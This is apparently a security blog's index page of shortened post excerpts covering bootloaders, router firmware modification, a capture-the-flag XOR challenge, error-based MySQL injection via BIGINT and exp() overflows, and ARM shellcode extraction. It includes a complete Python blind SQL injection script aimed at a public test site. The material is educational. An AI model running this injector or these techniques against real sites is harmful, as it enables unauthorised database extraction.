Writing a Bootloader

What is a Bootloader?

A bootloader is a special program that is executed each time a bootable device is initialized by the computer during its power on or reset that will load the kernel image into the memory. This application is very close to hardware and to the architecture of the CPU. All x86 PCs boot in Real Mode. In this mode you have only 16-bit instructions. Our bootloader runs in Real Mode and our bootloader is a 16-bit program.

https://manybutfinite.com/img/boot/bootProcess.png

How this works?

When you switch on the PC the BIOS want to boot up an OS which must be found somewhere in hard disks, floppy disk, CDs, etc. The order in which BIOS searches an OS is user configurable. Next the BIOS reads the first 512 byte sector of the bootable disk. Usually a sector is 512 bytes in size. This is known as the Master Boot Record (MBR). BIOS simply loads the contents of the MBR into memory location “0x7c00” and jumps to that location to start executing whatever code is in the MBR. Our bootloader should be 512 bytes in size as well.
https://manybutfinite.com/img/boot/masterBootRecord.png
(more…)

How to Turn Your Switch into a Snitch

Warning: The author takes no responsibility for any damage you may cause to your device. This post is meant for educational purposes and strictly NOT for malicious purposes.

This post is all about modifying your existing router firmware to perform cool things.

Hardware and Tools Needed:

For the router, I am using a TP-Link MR3020. You may use whatever router you like but make sure you won’t brick your device after or while uploading the modified firmware. Also make sure your firmware can be reversed and dumped using the FMK (Firmware Mod Kit).

Download Firmware Mod Kit
(more…)

Solving Root-Me XORed Picture Challenge

Here‘s a cool challenge by Ryscrow of Root-Me . The challenge says

For this challenge you will need to decypher a simple XORed picture. This BMP picture was mistakenly encrypted. Can you recover it ?

The file name is “ch3.bmp” and let’s open in a hex editor and see. I first inspected the first 20 bytes and we can see a string saying “fallen”. Actually I guessed this key of length 6.

View post on imgur.com


(more…)

Exe2Image

This is A simple utility to convert EXE files to PNG images and vice versa. This is written using Java 8. Inspired by this article.

View post on imgur.com

Putty.exe converted to an image using green pixels.

View post on imgur.com

Download:
https://github.com/OsandaMalith/Exe2Image/releases

This tool was added to PentestBox : https://modules.pentestbox.com/#forensics

Softpedia:
http://www.softpedia.com/get/Security/Encrypting/EXE-to-Image-Converter.shtml

Other Shares:
http://www.kitploit.com/2017/09/exe2image-simple-utility-to-convert-exe.html

Automated Blind SQL Injector

There are lots of tools available for blind injection but when it comes to customizing payloads and bypassing WAFs I thought of writing my own program to extract data based on the true and false boolean conditions.

This is the Python version: https://github.com/OsandaMalith/BSSQLi/blob/master/bssqli.py

import urllib2
import re

# CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
# https://creativecommons.org/licenses/by/2.0/

url = 'http://testphp.vulnweb.com/artists.php?artist=2' # target
payload = '(select user())'; # your payload
trueString = 'Blad3' # Text or html in the true condition
maxLength = 20
result = ''
for i in range(1, maxLength + 1):
    for j in range(32, 127):
        if(chr(j).isupper()):
            continue
        sql = " and substring("+ payload +"," + str(i) + ",1)=" + hex(ord(chr(j))) + "-- -"
        target = url + sql
        req = urllib2.Request(target)
        # If cookies exists
        # req.add_header('Cookie','value=1;value=2')
        page = urllib2.urlopen(req)
        html = page.read()

        try:
            re.search(r'(.*)'+trueString+'(.*?) .*', html, flags=re.DOTALL).group(1)
            print ('Found: ' + chr(j))
            result += chr(j)
        except:
            pass

print (result)

(more…)

Error Based SQL Injection Using EXP

Overview

This is another overflow in the DOUBLE data type in MySQL I found. You can refer to my previous post on BIGINT Overflow Error based injections if you want to understand exploiting overflows in extracting data. Also the queries are similar to my previous post. When we take the functions in MySQL I was interested in the mathematical functions. They too should contain some data type to hold values. So I went on testing for functions which would cause any overflow errors and I found out that exp() would cause a overflow error when we pass a large value above 709.

mysql> select exp(709);

+-----------------------+

| exp(709)              |

+-----------------------+

| 8.218407461554972e307 |

+-----------------------+

1 row in set (0.00 sec)



mysql> select exp(710);

ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

The exp is the opposite of the ln and log functions of MySQL. If I briefly explain the functionality of these, log and ln and both returns the answer to the natural logarithm or to the base e. In common e is approximated to: \(e \approx 2.71828183\) .

\(ln(15) = log_ {e} (15) = 2.70805020110221 \)
(more…)

Installing GCC on iOS 8

I recently entered the world of mobile security and pen-testing. I wanted to install GCC in a jailbroken iOS 8.3 and had to face lots of issues in finding the correct package for it. So I somehow managed to install and run my own C apps 🙂 I thought of sharing this with you, if you are too struggling like me here’s how I managed to install this.

First install OpenSSH and essential bash commands like apt-get, sed, ps, etc. After that you have to install few debian packages along with gcc. Download this zip file I made and drop it into any folder in your iPhone using a SFTP connection or a desktop file browser. After that install all the packages in it.

[code language=”bash”]
$ dpkg -i *.deb
[/code]
(more…)

BIGINT Overflow Error Based SQL Injection

Overview

I was interested in finding out new techniques that we can use in extracting data via MySQL errors. This is a detailed write-up which will make you understand how I made these queries. When we look how MySQL handles integers I was interested in causing overflows. This is how MySQL stores integers.

View post on imgur.com


(Source: http://dev.mysql.com/doc/refman/5.5/en/integer-types.html)
These overflow errors will cause in MySQL versions 5.5.5 and above only. In below versions integer overflows would result in a silent wraparound.
The data type BIGINT is of 8 bytes in size which means it’s of 64 bits. If we take the maximum signed value of a BIGINT its “0b0111111111111111111111111111111111111111111111111111111111111111”, “0x7fffffffffffffff”, “9223372036854775807” in binary, hex and decimal respectively. Once we evaluate numerical expressions on this value like adding will cause a “BIGINT value is out of range” error. 

mysql> select 9223372036854775807+1; 

ERROR 1690 (22003): BIGINT value is out of range in '(9223372036854775807 + 1)'

(more…)

Getting Shellcode from ARM Binaries

For x86 and x86_64 there are already commands for extracting shellcode and printing them nicely formatted. But when it comes to ARM none of them work would because of the way objdump would dump the opcodes. For example if this is my sample program:

.section .text

.global _start



_start:



    .code 32

    # Thumb-Mode on

    add     r6, pc, #1

    bx  r6



    .code   16

    # _write()

    mov     r2, #7

    mov r1, pc

    add r1, #12

    mov     r0, $0x1

    mov     r7, $0x4

    svc     0



    # _exit()

    sub r0, r0, r0

    mov     r7, $0x1

    svc 0



.ascii "Osanda\n"

(more…)